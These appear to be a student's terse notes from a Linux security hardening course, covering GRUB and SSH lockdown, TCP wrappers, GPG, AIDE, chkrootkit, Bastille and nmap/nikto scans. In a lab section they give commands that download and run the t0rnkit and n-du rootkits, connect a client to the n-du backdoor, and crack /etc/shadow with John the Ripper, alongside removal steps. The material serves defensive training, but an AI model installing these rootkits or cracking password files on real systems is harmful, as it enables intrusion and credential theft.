### LinuxCBT Basic Security Edition ###
BIOS
1.Disable all unnecessary boot media
2.set a setup password
3.set a system password
front besel chassis information
DELL PowerEdge 2600
GRUB
How to enter
when the select kernel menu show up,press E
single or init 1 enter single user mode
Note:in single mode ,network is not enabled
/sbin/grub-md5-crypt
cd /sbin/
./grub-md5-crypt set grub password
grub config is located at:
/boot/grub/grub.conf
or /etc/grub.conf (symlink of above)
under the timeout line add following code
password --md5 $1$5nV2i1$sj7qEsjQATwUwlz4zBZrl.
Book-up security measures/checks
/var/log/dmesg
which dmesg
dmesg | grep -i cpu
dmesg | grep -i selinux
1.check version of kernel - should match install/patched version
grep -i mem /var/log/dmesg
2.CPU
3.Memory
4.Hard Drive(s)
5.Network Interface(s)
/var/log/boot.log
df -h
1.net.ipv4.ip_forward = 0
2.net.ipv4.conf.default.accept_source_route = 0
init process
1.BIOS(floppy/CD-ROM/Keyboard/etc,/drives)
2.GRUB - (Menu)
3.Kernel(Linux) - Initializes hardware
4.init - first user-space processes - /etc/inittab
remote access card
/etc/inittab
1.Default Run-Level to 3 from 5
a.No graphical TCP X Windows Listener
b.Uses fewer system resources
2.Disabled CTRL-ALT-DEL reboot
3.Reduce the number of TTYs
initq
ps -ax | grep -i minget
rpm -qa >`date +%F`.installed.packages.list
TTYs
1.Logon whenever possible as no-privileged user
2.su in as root when necessary.
'/etc/security/'
/etc/ssh/sshd_config
1.Denied Root Login
Banner Implementation
1.edit the banner-related files,include:
'/etc/issue' - before
This system is for the use of authorized users only.Individuals using this computer system with authority.without authority,on th excess of their monitored and recorded by system personnel.
'/etc/motd' - after
This is a monitored Computer System!!!
2.updated '/etc/ssh/sshd_config file to use banner /etc/issue
3.reload the sshd service
who/w/whoami
Useful utilities
1.last
a.returns users that have recently logon the system
/var/log/wtmp
2.netstat - shows listening/connected sockets
a.etstat -ntlp
b.netstat -nulp
c.netstat -ant
lsof
located at /usr/sbin/lsof
lsof /tmp
lsof -i review only sockets
lsof -i@localhost review only sockets
lsof -iTCP@localhost
lsof -iUDP@localhost
lsof -iTCP@localhost :22
lsof -p pid #show files opened by specified pid process
lsof -c progressname #show files opened by specified name process
syslog - logs and routes messages to files/systems/etc
Facilities/Priorities
Kernel/mail/local/user - debug - emerg
/etc/ssyslog.conf
authpriv.* /var/log/secure
/var/log/messages
NTP
NTP Server:192.168.1.109 - linuxcbtserv3.linuxcbt.internal
yum install ntp
edit the /etc/ntp.conf file
service ntpd restart
ntpq -np
linuxcbtserv2(3) -> linuxcbtserv3(2) ->3(1) Internet NTP hosts
rsyslog-replicate
vim /etc/rsyslog.conf
uncomment tow lines below:
#$ModLod imudp
#$UDPServerRun 514
mail.* @192.168.1.109
*.* @192.168.1.109
netstat -ntlp | grep 25
nmap upgrade
http://www.insecure.org
rpm -ltn nmap*.rpm
view files in the rpm packages
rpm -qpl nmap*.rpm
rpm -Uvh package*.rpm //upgrade package
wget http://nmap.org/dist/nmap-6.46.tar.bz2
rpm -vhU http://nmap.org/dist/nmap-6.46-1.i386.rpm;
rpm -vhU http://nmap.org/dist/zenmap-6.46-1.noarch.rpm;
rpm -vhU http://nmap.org/dist/ncat-6.46-1.i386.rpm;
rpm -vhU http://nmap.org/dist/nping-0.6.46-1.i386.rpm;
NMAP
root:opens half-connections
nmap -> (TCP-SYN) ->Target ->(ACK)
non-privileged user:open standard TCP connections
nmap ->(TCP->SYN) ->Target ->(ACK) ->nmap(SYN|ACK)
nmap -v localhost
rpm -ql nmap
nmap -v -oN nmap.scan.1 localhost
nmap -v -sU localhost //UDP scan
NMAP lockdown
chkconfig --list cups
chkconfig cups off
nmap -v -p 631 localhost
nmap -v -O localhost
nessus
Client(Wins | Linux | UNIX)-> SSL -> Server(Unix | Linux)
Telnet && vsftpd
yum install telnet telnet-server
apt-get install telnetd
yum install vsftpd
apt-get install vsftpd
3 Layers of security
XINETD -> TCPWrappers -> TELNETD(/usr/sbin/in.telnetd)
TCPWrappers (/etc/{hosts.allow|hosts.deny})
1.Parse hosts.allow(places rules here)
2.parse hosts.deny(place catchall here)
3.If no match in either files,grant access
Note:processes the rules in hosts.allow,hosts.deny immediately
telnet will read the /etc/issue.net file when logged in
/etc/xinetd.d/telnet
only_from 192.168.1.113 192.168.1.114
port 23 #default
port 2323
/etc/hosts.allow
man hosts.allow
#format:service : client_list
in.telnetd : 192.168.1.113
in.telnetd : 192.168.1.0/255.255.255.0
SSHD : 192.168.1.0/255.255.255.0
Increase security with extended file attributes - chattr
key files include:
/etc/inittab
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/hosts.allow
/etc/hosts.deny
/etc/xinetd.d/telnet
/etc/hosts
/etc/resolv.conf
/etc/nsswitch.conf
lsattr
chattr +i ssh_config
lsattr ssh.config
tcpdump -w tcpdump.log.1
ethereal
tcpdump -w tcpdump.log.1 dst port 23
ftp://anonymous:anonymous@192.168.1.109
SSH Terms/Concepts
SSH is based on PKI
Private Key/Public Key(Pair) - asymmetrical(非对称)
~/.ssh/known_hosts(server's public keys) - server-based public-private key
ssh_client -> encrypts data to server using server's public key
ssh-keygen -t rsa
Note:~/.ssh/authorized_keys should be 600(permission)
Note:Check ~/.ssh/authorized_keys files for tempering
SCP(RCP)/SFTP(FTP)(sub-systems of SSH)
scp source destination
SSH Port Forwarding - Creates Psuedo-VPNs
local port forwarding
ssh_client -> ssh_server- to create encrypted tunnels
1.modify /etc/xinetd.d/telnet
bind = 127.0.0.1
local(127.0.0.1:2323) -> SSH_TUNNEL -> Remote(127.0.0.1:23)
2.ssh -L 2323:127.0.0.1:23 root@192.168.1.109
telnet localhost 2323
remote port forwarding (TODO)
3.ssh -R 23:127.0.0.1:2323 root@192.168.1.109
MD5SUM
md5sum filename
GPG/PGP - PKI -> Asymmetric Encryption
Public Key/Private Key Pair
GPG - encrypts data
Steps:
1.Generate PKI pair(Public/Private Key Pair)
gpg --help | grep gen
gpg --list-keys
a.gpg --gen-key
gpg --fingerprint
Encrypt
gpg -e --armor(盔甲) -r yaowenqiang test.txt(nicely formated)
gpg --encrypt -r yaowenqiang test.txt
Decrypt
gpg --decrypt test.txt.gpg
gpg -d test.txt.gpg
gpg -o test.txt.gpg.decryptedd--decrypt test.txt.gpg
2.Create a web of trust using:
a.gpg --export --armor -o yaowenqiang.asc.pub
b.import trusted user's public key
c.this creates a web of trust between the users
Import
gpg --import jack@ubuntu-11.asc.pub
gpg -e -r jacky --armor -o outputfile inputfile use recipient's name
gpg -e -r 42521BCA(recipient unique id) --armor -o outputfile inputfile
GPG Encryption and Signing
1.Signing is different from Encrypting
2.Signing and Encrypt communications:
a.Proves authenticity
b.encrypts data
3.Signing entails using one's private key to sign the data,
a.recipient decrypts signature using your public key
b.recipient decrypts communications stream using their private key
gpg -eas -r 42521BCA test.txt(sign)
gpg --edit-key 42521BCA(key id)
gpg>trust
5
q
Note:Both recipient and sender need to trust each other's public key GPG verify
gpg --help | grep -i sign
When creating detached signatures,no need to specify recipient's public key,The process of creating signatures,is contingent upon the sender's private key
gpg -ba test.txt.asc
will create a test.txt.asc.asc sign file
gpg -b test.txt.asc
will create a test.txt.asc.sig sign file
copy the asc and the sin file together to other systems
Note:When verify a detached signature and decrypting the contents of its associated encrypted file,do the following:
a.Verify MD5SUM
b.Verify the signature.
gpg --verify sign-file-name encrypted-file-name
gpg --verify test.txt.asc.sig test.txt.asc
c.Decrypt the encrypted file
gpg -d -o test.txt test.txt.asc
http://www.snort.org
MUTT - with GPG/PGP G/PGP Encryptions
m compose new message
echo $MAIL
press 'p' ken when send messages will show PGP options
postconf | grep -i interface
vim /etc/postfix/main.cf
change inet_interfaces to all
services postfix restart
mailq
postfix flush
Users and Groups
command line:
yum install system-config-users
system-config-users
/etc/passwd
/etc/shadow
/etc/group
/etc/gshadow
/etc/login.defs
PASS_MAX_DAYS 45
PASS_MIN_DAYS 3
PAS_MIN_LEN 6
PASS_WARN_AGE 7
chage
chage -l root
paddwd username
chage -m 3 username
chage -M 3 -W 7 username
for i in `awk -F :{'print $1'} /etc/passwd`;do echo $i;done;
for i in `awk -F : {'print $1'} /etc/passwd`;do echo USERNAME: $i;chage -l $i; done;
userdel
rm -rf linuxcbt{2,3}
join
openwall.com
wget http://openwall.com/john/j/john-1.8.0.tar.xz
dtrx john-1.8.0.tar.xz
cd john-1.8.0/src
make
make linux-x86-sse2
su
cd ../run
./john -users:jack2,root,jack /etc/shadow
cat john.pot
./john -show -users:jack2 /etc/shadow
AIDE
tripwire
aide.sourceforge.net
wget http://sourceforge.net/projects/aide/files/aide/0.15.1/aide-0.15.1.tar.gz/download -O aide-0.15.1.tar.gz
tar -tzvf aide-0.15.1.tar.gz
dtrx aide-0.15.1.tar.gz
wget http://sourceforge.net/projects/mhash/files/latest/download\?source\=files -O mhash-0.9.9.9.tar.bz2
dtrx mhash-0.9.9.9.tar.bz2
cd mhash*
./configure
make
make install
cd aide*
apt-get install bison flex
sudo apt-get install --reinstall zlibc zlib1g zlib1g-dev
./configure
make
make install
md5sum /usr/local/bin/aide
7d345c5b2019ab2c03cd0252d9561d87 /usr/local/bin/aide
md5sum src/aide
7d345c5b2019ab2c03cd0252d9561d87 aide
find ./ -name aide.conf
cp aide-0.15.1/doc/aide.conf .
vim aide.conf
types of lines:
1.Variables
a=b
2.Macros
@@define
3.type of files,which includes directories ,to monitor
Note:Monitor files that change infrequently
AIDE Usage:
1.Generate AIDE DB - aide -c /home/jack/aide.conf -init
2.Check file status - aide -c /home/jack/aide.conf -check
apt-get install genisoimage
mkisofs -V AIDE_FI -J -R -o aide.iso AIDE/
apt-get install wodim
cdrecord -v -eject aide.iso
zcat aide.db.new
mount /media/cdrom
RootKits - provide back-doors to your Linux system
Methods of installation
1.Circumventing GRUB/LiLO security - runlevel 1 access
2.Gain non-privileged account,then elevate to root and install
3.Gain root access,then install rootkit
4.Physical access - Leads to other methods of installation
T0rnkit/Tornkit
wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/tk.tgz
./t0rnkit
ChkrootKit - www.chkrootkit.org
runs as a shell script - with helper binaries
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz.sig
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
rpm -qf /usr/bin/find
rpm -qf /usr/bin/find
rpm -qf /usr/bin/du
copy /bin/ls and /usr/bin/find from a similar system or reinstall ls and find via yum
yum reinstall coreutils findutils
./chkrootkit OPTIONS TESTNAME
ps INFECTED
rpm -qf /usr/bin/top
yum reinstall procps
ifconfig INFECTED
netstat INFECTED
yum reinstall net-tools
make sense
promiscuous(混杂模式)
rm -rf /usr/src/.puta/
rm -rf /usr/info/
rm -rf /etc/ttyhash
rm -rf /etc/inetd.conf
rm -rf /usr/sbin/in.fingerd
rpm -qf /bin/login
yum reinstall util-linux-ng.
vim /etc/rc.sysinit
remove the last two line
/usr/sbin/nscd is not owned by any package,need to be copied from other system
/ ubuntu system
dpkg -S /bin/ls
aptitude reinstall coreutils
dpkg -S `which find`
aptitude reinstall findutils
dpkg -S `which netstat`
aptitude reinstall net-tools
dpkg -S `which ps`
aptitude reinstall procps
dpkg -S `which init`
aptitude reinstall upstart
dpkg -S `which login`
aptitude reinstall login
RootKit FAQs:
Usually 3 types:
1.changes key binaries
2.runs as kernel modules - LKM
3.writes directly to /dev/kmem
cat /proc/modules
n-du rootkit - backdoor - UDP listenster (UDP:1500)
waits specially - crafted packets,
when received,n-du switches to TCP:port_specified_by_cracker,
packetstormsecurity.com/UNIX/penetration/rootkits
wget http://packetstormsecurity.com/files/download/34483/n-du.tgz
tar -zxvf n-du.tgz && cd n-du && make
copy the client 'n-client' to another system
scp n-client jack@192.168.1.114:
start a daemon
./n-du
Process name.. n-du --(0x804969e)
Process id.... 21637
netstat -nulp
n-du(server) - ./n-du
n-client -./n-client host TCP(1666) UDP(1500)
i.e ./n-client 192.168.1.109 1666 1500
nmap -sU -v 192.168.1.114
nmap -sU -v -p 1500 192.168.1.114
Bastille
bastille-linux.sourceforge.net
wget -O bastille-3.0.9.tar.bz2 http://sourceforge.net/projects/bastille-linux/files/bastille-linux/3.0.9/Bastille-3.0.9.tar.bz2/download?use_mirror=ncu&download=
dtrx Bastille*
cd Bastille
./Install.sh
export PATH=$PATH:/usr/sbin
yum install cpan
yum install perl-Curses
bastille -c
perl -MCPAN -e shell
cpan> install Curses
apt-get install libcurses-perl
apt-get install perl-tk
bastille //graphical interface
bastille -c //command line interface
bastille --assess
bastille -a
Bastille Linux - Hardening
File Permission: traceroute,ping,ifconfig
which rlogin
Umask : Full = 777
777 - 002 = 775(non-privileged user's directory creation permissions)
777 -077 = 700(rwx------ linuxcbt.linuxcbt)
/var/www/html
var/www/html/index.html - var/www/index.html
### Nmap Upgrade ###
Features:
1.NSE - scriptable,extensible,plug-in support
2.Zenmap - Unified GUI - Cross-platform:Nix(MacOSX,Solaris,Linux,BSD,etc.)
3.Ability to compare and contrast scans
4.Support IPv6 scanning
5.Ability to determine uptime of target system(not always)
Tasks:
1.Upgrade NMap to current version
a.http://nmap.org/dist - download the appropriate binary from here
wget http://nmap.org/dist/nmap-6.46-1.i386.rpm
wget http://nmap.org/dist/sigs/nmap-6.46-1.i386.rpm.asc
b.http://nmap.org/dist/sigs/nmap-6.46-1.i386.rpm.digest.txt - Download sign/hashes from hter
c.wget http://nmap.org/data/nmap_gpgkeys.txt
d.'gpg --verify *asc'
e.'gpg --print-md sha256 nmap*.rpm' - confirms SHASUMs
f.'gpg --print-mds nmap*.rpm' - confirms ALL sums
Note:It is not necessary to have the signature file of targget file,in order to use 'gpg' to confirm the various signatures associated with the file
g.'rpm -Uvh nmap*.rpm'
h.'/usr/bin/nmap'
Note:primary binary
2.Perform scans
a.'nmap -v -A 192.168.1.0/24' - scan the subnet searching for OS and version
### ZenMap - GUI ###
Features:
1.Cross-platform GUI
2.Provides rich interface for graphing /reporting/comparisons/etc
### nping ###
Features:
1.Included with Nmap package
2.Granular packet probing control:TCP,UDP,ICMP,ARP,etc
3.Fails between:standard PING and NMap
4.Response time measurement
5.Stress-testing: i.e,packet size alteration with specific socket combinations
6.Traceroute:path taken between client and server
Usage:
netstat -rn
1.'nping 192.168.1.1' - ICMP query of 5 packets
2.'nping --tcp -p 80 192.168.1.1' - TCP/SYN scan of port 80
3.'nping --udp -p 123 192.168.1.1' - UDP scan of port 123
4.'nping --udp -p 123 --delay 200ms 192.168.1.1' - UDP scan of port 123 with one package
5.'nping --tcp -p 80 -c 1 192.168.1.1' - sends 1 packet to garget
6.'nping --tr 192.168.1.1' - traceroute
7.'nping --tcyp -p 80 -c 1 192.168.75.101,13'
### nikto ###
Features:
1.Web server analysis
2.Modular via plug-in
http://cirt.net
wget http://cirt.net/nikto/nikto-2.1.5.tar.bz2
tar xjvf nikto-2.1.5.tar.bz2
Usage:
./nikto.pl -l - list available modules
1.'nikto.pl -h 192.168.1.1'
Note:Nikto found among other things:/doc/ enabled
This reveals versions of installed applications
Note:Nikto found Apache and Key modules versions
Note:Disable server signatures on the server side if this is a concern
./nikto.pl -o `date +%F`.nikto.scan.txt -h 192.168.1.1
./nikto.pl -update
./nikto.pl -T 9 -h 192.168.1.1
转载于:https://my.oschina.net/8pBwdEmxK2hL/blog/266273